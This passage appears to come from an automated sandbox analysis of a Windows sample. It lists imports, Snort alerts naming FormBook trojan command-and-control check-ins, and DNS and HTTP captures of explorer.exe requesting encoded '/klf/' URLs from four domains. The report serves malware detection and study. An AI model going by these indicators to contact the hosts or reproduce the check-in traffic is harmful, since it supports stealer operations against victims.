                                      RT_DIALOG | 0x3ac478 | 0x100 | data | English | United States
                                      RT_DIALOG | 0x3ac578 | 0x11c | data | English | United States
                                      RT_DIALOG | 0x3ac698 | 0x60 | data | English | United States
                                      RT_GROUP_ICON | 0x3ac6f8 | 0x14 | data | English | United States
                                      RT_MANIFEST | 0x3ac710 | 0x1eb | XML 1.0 document, ASCII text, with very long lines, with no line terminators | English | United States

                                      Imports

                                      DLL | Import
                                      KERNEL32.dll | CloseHandle, SetFileTime, CompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetFileSize, GetModuleFileNameA, GetTickCount, GetCurrentProcess, lstrcmpiA, ExitProcess, GetCommandLineA, GetWindowsDirectoryA, GetTempPathA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, lstrcmpA, GetEnvironmentVariableA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, SetErrorMode, GetModuleHandleA, LoadLibraryA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, CopyFileA
                                      USER32.dll | ScreenToClient, GetWindowRect, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, EndDialog, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxA, CharPrevA, DispatchMessageA, PeekMessageA, CreateDialogParamA, DestroyWindow, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, TrackPopupMenu, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
                                      GDI32.dll | SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
                                      SHELL32.dll | SHGetMalloc, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
                                      ADVAPI32.dll | RegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
                                      COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                      ole32.dll | OleInitialize, OleUninitialize, CoCreateInstance
                                      VERSION.dll | GetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

                                      Possible Origin

                                      Language of compilation system | Country where language is spoken
                                      English | United States

                                      Network Behavior

                                      Snort IDS Alerts

                                      Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                      04/08/21-12:28:02.299363 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49766 | 34.102.136.180 | 192.168.2.4
                                      04/08/21-12:28:25.088543 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49769 | 34.102.136.180 | 192.168.2.4
                                      04/08/21-12:28:43.295202 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49770 | 80 | 192.168.2.4 | 34.102.136.180
                                      04/08/21-12:28:43.295202 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49770 | 80 | 192.168.2.4 | 34.102.136.180
                                      04/08/21-12:28:43.295202 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49770 | 80 | 192.168.2.4 | 34.102.136.180
                                      04/08/21-12:28:43.409063 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49770 | 34.102.136.180 | 192.168.2.4

                                      Network Port Distribution

                                      TCP Packets

                                      Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                      Apr 8, 2021 12:27:41.465953112 CEST | 49760 | 80 | 192.168.2.4 | 69.163.220.52
                                      Apr 8, 2021 12:27:41.620493889 CEST | 80 | 49760 | 69.163.220.52 | 192.168.2.4
                                      Apr 8, 2021 12:27:41.620574951 CEST | 49760 | 80 | 192.168.2.4 | 69.163.220.52
                                      Apr 8, 2021 12:27:41.620716095 CEST | 49760 | 80 | 192.168.2.4 | 69.163.220.52
                                      Apr 8, 2021 12:27:41.775491953 CEST | 80 | 49760 | 69.163.220.52 | 192.168.2.4
                                      Apr 8, 2021 12:27:41.775533915 CEST | 80 | 49760 | 69.163.220.52 | 192.168.2.4
                                      Apr 8, 2021 12:27:41.775551081 CEST | 80 | 49760 | 69.163.220.52 | 192.168.2.4
                                      Apr 8, 2021 12:27:41.775660992 CEST | 49760 | 80 | 192.168.2.4 | 69.163.220.52
                                      Apr 8, 2021 12:27:41.775732994 CEST | 49760 | 80 | 192.168.2.4 | 69.163.220.52
                                      Apr 8, 2021 12:27:41.931611061 CEST | 80 | 49760 | 69.163.220.52 | 192.168.2.4
                                      Apr 8, 2021 12:28:02.170397043 CEST | 49766 | 80 | 192.168.2.4 | 34.102.136.180
                                      Apr 8, 2021 12:28:02.183226109 CEST | 80 | 49766 | 34.102.136.180 | 192.168.2.4
                                      Apr 8, 2021 12:28:02.183315039 CEST | 49766 | 80 | 192.168.2.4 | 34.102.136.180
                                      Apr 8, 2021 12:28:02.183496952 CEST | 49766 | 80 | 192.168.2.4 | 34.102.136.180
                                      Apr 8, 2021 12:28:02.196137905 CEST | 80 | 49766 | 34.102.136.180 | 192.168.2.4
                                      Apr 8, 2021 12:28:02.299362898 CEST | 80 | 49766 | 34.102.136.180 | 192.168.2.4
                                      Apr 8, 2021 12:28:02.299391031 CEST | 80 | 49766 | 34.102.136.180 | 192.168.2.4
                                      Apr 8, 2021 12:28:02.299635887 CEST | 49766 | 80 | 192.168.2.4 | 34.102.136.180
                                      Apr 8, 2021 12:28:02.299704075 CEST | 49766 | 80 | 192.168.2.4 | 34.102.136.180
                                      Apr 8, 2021 12:28:02.312124014 CEST | 80 | 49766 | 34.102.136.180 | 192.168.2.4
                                      Apr 8, 2021 12:28:24.894125938 CEST | 49769 | 80 | 192.168.2.4 | 34.102.136.180
                                      Apr 8, 2021 12:28:24.908015013 CEST | 80 | 49769 | 34.102.136.180 | 192.168.2.4
                                      Apr 8, 2021 12:28:24.908196926 CEST | 49769 | 80 | 192.168.2.4 | 34.102.136.180
                                      Apr 8, 2021 12:28:24.908379078 CEST | 49769 | 80 | 192.168.2.4 | 34.102.136.180
                                      Apr 8, 2021 12:28:24.925878048 CEST | 80 | 49769 | 34.102.136.180 | 192.168.2.4
                                      Apr 8, 2021 12:28:25.088542938 CEST | 80 | 49769 | 34.102.136.180 | 192.168.2.4
                                      Apr 8, 2021 12:28:25.088572025 CEST | 80 | 49769 | 34.102.136.180 | 192.168.2.4
                                      Apr 8, 2021 12:28:25.088747025 CEST | 49769 | 80 | 192.168.2.4 | 34.102.136.180
                                      Apr 8, 2021 12:28:25.089088917 CEST | 49769 | 80 | 192.168.2.4 | 34.102.136.180
                                      Apr 8, 2021 12:28:25.101531029 CEST | 80 | 49769 | 34.102.136.180 | 192.168.2.4
                                      Apr 8, 2021 12:28:43.282567024 CEST | 49770 | 80 | 192.168.2.4 | 34.102.136.180
                                      Apr 8, 2021 12:28:43.294913054 CEST | 80 | 49770 | 34.102.136.180 | 192.168.2.4
                                      Apr 8, 2021 12:28:43.295043945 CEST | 49770 | 80 | 192.168.2.4 | 34.102.136.180
                                      Apr 8, 2021 12:28:43.295202017 CEST | 49770 | 80 | 192.168.2.4 | 34.102.136.180
                                      Apr 8, 2021 12:28:43.307471991 CEST | 80 | 49770 | 34.102.136.180 | 192.168.2.4
                                      Apr 8, 2021 12:28:43.409063101 CEST | 80 | 49770 | 34.102.136.180 | 192.168.2.4
                                      Apr 8, 2021 12:28:43.409204960 CEST | 80 | 49770 | 34.102.136.180 | 192.168.2.4
                                      Apr 8, 2021 12:28:43.409269094 CEST | 49770 | 80 | 192.168.2.4 | 34.102.136.180
                                      Apr 8, 2021 12:28:43.409306049 CEST | 49770 | 80 | 192.168.2.4 | 34.102.136.180
                                      Apr 8, 2021 12:28:43.423803091 CEST | 80 | 49770 | 34.102.136.180 | 192.168.2.4

                                      UDP Packets

                                      Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                      Apr 8, 2021 12:26:35.185254097 CEST | 58028 | 53 | 192.168.2.4 | 8.8.8.8
                                      Apr 8, 2021 12:26:35.217926979 CEST | 53 | 58028 | 8.8.8.8 | 192.168.2.4
                                      Apr 8, 2021 12:26:35.575154066 CEST | 53097 | 53 | 192.168.2.4 | 8.8.8.8
                                      Apr 8, 2021 12:26:35.588382959 CEST | 53 | 53097 | 8.8.8.8 | 192.168.2.4
                                      Apr 8, 2021 12:26:36.324259996 CEST | 49257 | 53 | 192.168.2.4 | 8.8.8.8
                                      Apr 8, 2021 12:26:36.337037086 CEST | 53 | 49257 | 8.8.8.8 | 192.168.2.4
                                      Apr 8, 2021 12:26:43.994112015 CEST | 62389 | 53 | 192.168.2.4 | 8.8.8.8
                                      Apr 8, 2021 12:26:44.006736994 CEST | 53 | 62389 | 8.8.8.8 | 192.168.2.4
                                      Apr 8, 2021 12:26:44.795666933 CEST | 49910 | 53 | 192.168.2.4 | 8.8.8.8
                                      Apr 8, 2021 12:26:44.808929920 CEST | 53 | 49910 | 8.8.8.8 | 192.168.2.4
                                      Apr 8, 2021 12:26:45.788333893 CEST | 55854 | 53 | 192.168.2.4 | 8.8.8.8
                                      Apr 8, 2021 12:26:45.800919056 CEST | 53 | 55854 | 8.8.8.8 | 192.168.2.4
                                      Apr 8, 2021 12:26:46.666851044 CEST | 64549 | 53 | 192.168.2.4 | 8.8.8.8
                                      Apr 8, 2021 12:26:46.679826975 CEST | 53 | 64549 | 8.8.8.8 | 192.168.2.4
                                      Apr 8, 2021 12:26:48.438355923 CEST | 63153 | 53 | 192.168.2.4 | 8.8.8.8
                                      Apr 8, 2021 12:26:48.451751947 CEST | 53 | 63153 | 8.8.8.8 | 192.168.2.4
                                      Apr 8, 2021 12:26:49.404546976 CEST | 52991 | 53 | 192.168.2.4 | 8.8.8.8
                                      Apr 8, 2021 12:26:49.417890072 CEST | 53 | 52991 | 8.8.8.8 | 192.168.2.4
                                      Apr 8, 2021 12:26:50.460009098 CEST | 53700 | 53 | 192.168.2.4 | 8.8.8.8
                                      Apr 8, 2021 12:26:50.472664118 CEST | 53 | 53700 | 8.8.8.8 | 192.168.2.4
                                      Apr 8, 2021 12:26:51.404746056 CEST | 51726 | 53 | 192.168.2.4 | 8.8.8.8
                                      Apr 8, 2021 12:26:51.420192957 CEST | 53 | 51726 | 8.8.8.8 | 192.168.2.4
                                      Apr 8, 2021 12:26:52.277659893 CEST | 56794 | 53 | 192.168.2.4 | 8.8.8.8
                                      Apr 8, 2021 12:26:52.290190935 CEST | 53 | 56794 | 8.8.8.8 | 192.168.2.4
                                      Apr 8, 2021 12:26:53.223326921 CEST | 56534 | 53 | 192.168.2.4 | 8.8.8.8
                                      Apr 8, 2021 12:26:53.236185074 CEST | 53 | 56534 | 8.8.8.8 | 192.168.2.4
                                      Apr 8, 2021 12:26:54.315073967 CEST | 56627 | 53 | 192.168.2.4 | 8.8.8.8
                                      Apr 8, 2021 12:26:54.329687119 CEST | 53 | 56627 | 8.8.8.8 | 192.168.2.4
                                      Apr 8, 2021 12:26:55.079834938 CEST | 56621 | 53 | 192.168.2.4 | 8.8.8.8
                                      Apr 8, 2021 12:26:55.092345953 CEST | 53 | 56621 | 8.8.8.8 | 192.168.2.4
                                      Apr 8, 2021 12:27:06.022429943 CEST | 63116 | 53 | 192.168.2.4 | 8.8.8.8
                                      Apr 8, 2021 12:27:06.035130978 CEST | 53 | 63116 | 8.8.8.8 | 192.168.2.4
                                      Apr 8, 2021 12:27:25.859730005 CEST | 64078 | 53 | 192.168.2.4 | 8.8.8.8
                                      Apr 8, 2021 12:27:25.873265982 CEST | 53 | 64078 | 8.8.8.8 | 192.168.2.4
                                      Apr 8, 2021 12:27:27.783050060 CEST | 64801 | 53 | 192.168.2.4 | 8.8.8.8
                                      Apr 8, 2021 12:27:27.854206085 CEST | 53 | 64801 | 8.8.8.8 | 192.168.2.4
                                      Apr 8, 2021 12:27:28.419117928 CEST | 61721 | 53 | 192.168.2.4 | 8.8.8.8
                                      Apr 8, 2021 12:27:28.474838018 CEST | 53 | 61721 | 8.8.8.8 | 192.168.2.4
                                      Apr 8, 2021 12:27:28.519038916 CEST | 51255 | 53 | 192.168.2.4 | 8.8.8.8
                                      Apr 8, 2021 12:27:28.532649040 CEST | 53 | 51255 | 8.8.8.8 | 192.168.2.4
                                      Apr 8, 2021 12:27:28.973104954 CEST | 61522 | 53 | 192.168.2.4 | 8.8.8.8
                                      Apr 8, 2021 12:27:28.986398935 CEST | 53 | 61522 | 8.8.8.8 | 192.168.2.4
                                      Apr 8, 2021 12:27:29.363286972 CEST | 52337 | 53 | 192.168.2.4 | 8.8.8.8
                                      Apr 8, 2021 12:27:29.376493931 CEST | 53 | 52337 | 8.8.8.8 | 192.168.2.4
                                      Apr 8, 2021 12:27:29.548408985 CEST | 55046 | 53 | 192.168.2.4 | 8.8.8.8
                                      Apr 8, 2021 12:27:29.574208975 CEST | 53 | 55046 | 8.8.8.8 | 192.168.2.4
                                      Apr 8, 2021 12:27:29.814661980 CEST | 49612 | 53 | 192.168.2.4 | 8.8.8.8
                                      Apr 8, 2021 12:27:29.827439070 CEST | 53 | 49612 | 8.8.8.8 | 192.168.2.4
                                      Apr 8, 2021 12:27:30.255325079 CEST | 49285 | 53 | 192.168.2.4 | 8.8.8.8
                                      Apr 8, 2021 12:27:30.268846035 CEST | 53 | 49285 | 8.8.8.8 | 192.168.2.4
                                      Apr 8, 2021 12:27:30.637536049 CEST | 50601 | 53 | 192.168.2.4 | 8.8.8.8
                                      Apr 8, 2021 12:27:30.702814102 CEST | 53 | 50601 | 8.8.8.8 | 192.168.2.4
                                      Apr 8, 2021 12:27:31.303796053 CEST | 60875 | 53 | 192.168.2.4 | 8.8.8.8
                                      Apr 8, 2021 12:27:31.316726923 CEST | 53 | 60875 | 8.8.8.8 | 192.168.2.4
                                      Apr 8, 2021 12:27:31.858030081 CEST | 56448 | 53 | 192.168.2.4 | 8.8.8.8
                                      Apr 8, 2021 12:27:31.870361090 CEST | 53 | 56448 | 8.8.8.8 | 192.168.2.4
                                      Apr 8, 2021 12:27:31.957674026 CEST | 59172 | 53 | 192.168.2.4 | 8.8.8.8
                                      Apr 8, 2021 12:27:32.040802002 CEST | 53 | 59172 | 8.8.8.8 | 192.168.2.4
                                      Apr 8, 2021 12:27:32.336369038 CEST | 62420 | 53 | 192.168.2.4 | 8.8.8.8
                                      Apr 8, 2021 12:27:32.349597931 CEST | 53 | 62420 | 8.8.8.8 | 192.168.2.4
                                      Apr 8, 2021 12:27:32.819674969 CEST | 60579 | 53 | 192.168.2.4 | 8.8.8.8
                                      Apr 8, 2021 12:27:32.832504988 CEST | 53 | 60579 | 8.8.8.8 | 192.168.2.4
                                      Apr 8, 2021 12:27:33.856560946 CEST | 50183 | 53 | 192.168.2.4 | 8.8.8.8
                                      Apr 8, 2021 12:27:33.869515896 CEST | 53 | 50183 | 8.8.8.8 | 192.168.2.4
                                      Apr 8, 2021 12:27:41.262495995 CEST | 61531 | 53 | 192.168.2.4 | 8.8.8.8
                                      Apr 8, 2021 12:27:41.459153891 CEST | 53 | 61531 | 8.8.8.8 | 192.168.2.4
                                      Apr 8, 2021 12:27:45.038957119 CEST | 49228 | 53 | 192.168.2.4 | 8.8.8.8
                                      Apr 8, 2021 12:27:45.052339077 CEST | 53 | 49228 | 8.8.8.8 | 192.168.2.4
                                      Apr 8, 2021 12:28:02.128470898 CEST | 59794 | 53 | 192.168.2.4 | 8.8.8.8
                                      Apr 8, 2021 12:28:02.168994904 CEST | 53 | 59794 | 8.8.8.8 | 192.168.2.4
                                      Apr 8, 2021 12:28:15.093986988 CEST | 55916 | 53 | 192.168.2.4 | 8.8.8.8
                                      Apr 8, 2021 12:28:15.106564999 CEST | 53 | 55916 | 8.8.8.8 | 192.168.2.4
                                      Apr 8, 2021 12:28:16.849348068 CEST | 52752 | 53 | 192.168.2.4 | 8.8.8.8
                                      Apr 8, 2021 12:28:16.881546021 CEST | 53 | 52752 | 8.8.8.8 | 192.168.2.4
                                      Apr 8, 2021 12:28:24.871767044 CEST | 60542 | 53 | 192.168.2.4 | 8.8.8.8
                                      Apr 8, 2021 12:28:24.892980099 CEST | 53 | 60542 | 8.8.8.8 | 192.168.2.4
                                      Apr 8, 2021 12:28:43.241204977 CEST | 60689 | 53 | 192.168.2.4 | 8.8.8.8
                                      Apr 8, 2021 12:28:43.281166077 CEST | 53 | 60689 | 8.8.8.8 | 192.168.2.4

                                      DNS Queries

                                      Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                      Apr 8, 2021 12:27:41.262495995 CEST | 192.168.2.4 | 8.8.8.8 | 0x88a3 | Standard query (0) | www.contecoliving.com | A (IP address) | IN (0x0001)
                                      Apr 8, 2021 12:28:02.128470898 CEST | 192.168.2.4 | 8.8.8.8 | 0xa1d3 | Standard query (0) | www.identityofplace.com | A (IP address) | IN (0x0001)
                                      Apr 8, 2021 12:28:24.871767044 CEST | 192.168.2.4 | 8.8.8.8 | 0x36 | Standard query (0) | www.constipationhub.com | A (IP address) | IN (0x0001)
                                      Apr 8, 2021 12:28:43.241204977 CEST | 192.168.2.4 | 8.8.8.8 | 0xc57d | Standard query (0) | www.tententacleshydro.com | A (IP address) | IN (0x0001)

                                      DNS Answers

                                      Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                      Apr 8, 2021 12:27:41.459153891 CEST | 8.8.8.8 | 192.168.2.4 | 0x88a3 | No error (0) | www.contecoliving.com |  | 69.163.220.52 | A (IP address) | IN (0x0001)
                                      Apr 8, 2021 12:28:02.168994904 CEST | 8.8.8.8 | 192.168.2.4 | 0xa1d3 | No error (0) | www.identityofplace.com | identityofplace.com |  | CNAME (Canonical name) | IN (0x0001)
                                      Apr 8, 2021 12:28:02.168994904 CEST | 8.8.8.8 | 192.168.2.4 | 0xa1d3 | No error (0) | identityofplace.com |  | 34.102.136.180 | A (IP address) | IN (0x0001)
                                      Apr 8, 2021 12:28:24.892980099 CEST | 8.8.8.8 | 192.168.2.4 | 0x36 | No error (0) | www.constipationhub.com | constipationhub.com |  | CNAME (Canonical name) | IN (0x0001)
                                      Apr 8, 2021 12:28:24.892980099 CEST | 8.8.8.8 | 192.168.2.4 | 0x36 | No error (0) | constipationhub.com |  | 34.102.136.180 | A (IP address) | IN (0x0001)
                                      Apr 8, 2021 12:28:43.281166077 CEST | 8.8.8.8 | 192.168.2.4 | 0xc57d | No error (0) | www.tententacleshydro.com | tententacleshydro.com |  | CNAME (Canonical name) | IN (0x0001)
                                      Apr 8, 2021 12:28:43.281166077 CEST | 8.8.8.8 | 192.168.2.4 | 0xc57d | No error (0) | tententacleshydro.com |  | 34.102.136.180 | A (IP address) | IN (0x0001)

                                      HTTP Request Dependency Graph

                                      • www.contecoliving.com
                                      • www.identityofplace.com
                                      • www.constipationhub.com
                                      • www.tententacleshydro.com

                                      HTTP Packets

                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                      0 | 192.168.2.4 | 49760 | 69.163.220.52 | 80 | C:\Windows\explorer.exe
                                      Timestamp | kBytes transferred | Direction | Data
                                      Apr 8, 2021 12:27:41.620716095 CEST | 2074 | OUT | GET /klf/?KX6xM=0rjPofqhSZfXf0Up&-ZVxY8H=uZ2w+Z4jIpZbISXEVO0nnlcpcZqOXsEZ5ezvcOQFXu1NON7E3/DXgqh3GDvoQCt7q85D HTTP/1.1
                                      Host: www.contecoliving.com
                                      Connection: close
                                      Data Raw: 00 00 00 00 00 00 00
                                      Data Ascii:
                                      Apr 8, 2021 12:27:41.775533915 CEST | 2075 | IN | HTTP/1.1 301 Moved Permanently
                                      Date: Thu, 08 Apr 2021 10:27:41 GMT
                                      Server: Apache
                                      Location: https://www.contecoliving.com/klf/?KX6xM=0rjPofqhSZfXf0Up&-ZVxY8H=uZ2w+Z4jIpZbISXEVO0nnlcpcZqOXsEZ5ezvcOQFXu1NON7E3/DXgqh3GDvoQCt7q85D
                                      Content-Length: 346
                                      Connection: close
                                      Content-Type: text/html; charset=iso-8859-1
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6f 6e 74 65 63 6f 6c 69 76 69 6e 67 2e 63 6f 6d 2f 6b 6c 66 2f 3f 4b 58 36 78 4d 3d 30 72 6a 50 6f 66 71 68 53 5a 66 58 66 30 55 70 26 61 6d 70 3b 2d 5a 56 78 59 38 48 3d 75 5a 32 77 2b 5a 34 6a 49 70 5a 62 49 53 58 45 56 4f 30 6e 6e 6c 63 70 63 5a 71 4f 58 73 45 5a 35 65 7a 76 63 4f 51 46 58 75 31 4e 4f 4e 37 45 33 2f 44 58 67 71 68 33 47 44 76 6f 51 43 74 37 71 38 35 44 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.contecoliving.com/klf/?KX6xM=0rjPofqhSZfXf0Up&amp;-ZVxY8H=uZ2w+Z4jIpZbISXEVO0nnlcpcZqOXsEZ5ezvcOQFXu1NON7E3/DXgqh3GDvoQCt7q85D">here</a>.</p></body></html>


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                      1 | 192.168.2.4 | 49766 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
                                      Timestamp | kBytes transferred | Direction | Data
                                      Apr 8, 2021 12:28:02.183496952 CEST | 5879 | OUT | GET /klf/?-ZVxY8H=7bFgTrM7BIAhZVbcluuTkCF4DvVfpU2z3yBqmRvieMtJ1CCKShP62AIfkuNBDgKt+AQL&KX6xM=0rjPofqhSZfXf0Up HTTP/1.1
                                      Host: www.identityofplace.com
                                      Connection: close
                                      Data Raw: 00 00 00 00 00 00 00
                                      Data Ascii:
                                      Apr 8, 2021 12:28:02.299362898 CEST | 5879 | IN | HTTP/1.1 403 Forbidden
                                      Server: openresty
                                      Date: Thu, 08 Apr 2021 10:28:02 GMT
                                      Content-Type: text/html
                                      Content-Length: 275
                                      ETag: "6063a886-113"
                                      Via: 1.1 google
                                      Connection: close
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                      2 | 192.168.2.4 | 49769 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
                                      Timestamp | kBytes transferred | Direction | Data
                                      Apr 8, 2021 12:28:24.908379078 CEST | 5899 | OUT | GET /klf/?KX6xM=0rjPofqhSZfXf0Up&-ZVxY8H=YaIPTfple60n7g7yPaoibbVQRqDMQPAJpva4MWGp8vGpJzNikHS3aMUGlaJr1Ei+7AZ8 HTTP/1.1
                                      Host: www.constipationhub.com
                                      Connection: close
                                      Data Raw: 00 00 00 00 00 00 00
                                      Data Ascii:
                                      Apr 8, 2021 12:28:25.088542938 CEST | 5899 | IN | HTTP/1.1 403 Forbidden
                                      Server: openresty
                                      Date: Thu, 08 Apr 2021 10:28:24 GMT
                                      Content-Type: text/html
                                      Content-Length: 275
                                      ETag: "605db497-113"
                                      Via: 1.1 google
                                      Connection: close
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                      3 | 192.168.2.4 | 49770 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
                                      Timestamp | kBytes transferred | Direction | Data
                                      Apr 8, 2021 12:28:43.295202017 CEST | 5901 | OUT | GET /klf/?-ZVxY8H=Vu9q6EMrxGDqg7ZmTlOQb6qpgFgK5wW/L8aO6You1Lc6UR7BvVtveZZ7OpvOdghAil0A&KX6xM=0rjPofqhSZfXf0Up HTTP/1.1
                                      Host: www.tententacleshydro.com
                                      Connection: close
                                      Data Raw: 00 00 00 00 00 00 00
                                      Data Ascii:
                                      Apr 8, 2021 12:28:43.409063101 CEST | 5902 | IN | HTTP/1.1 403 Forbidden
                                      Server: openresty
                                      Date: Thu, 08 Apr 2021 10:28:43 GMT
                                      Content-Type: text/html
                                      Content-Length: 275
                                      ETag: "605e0bc6-113"
                                      Via: 1.1 google
                                      Connection: close
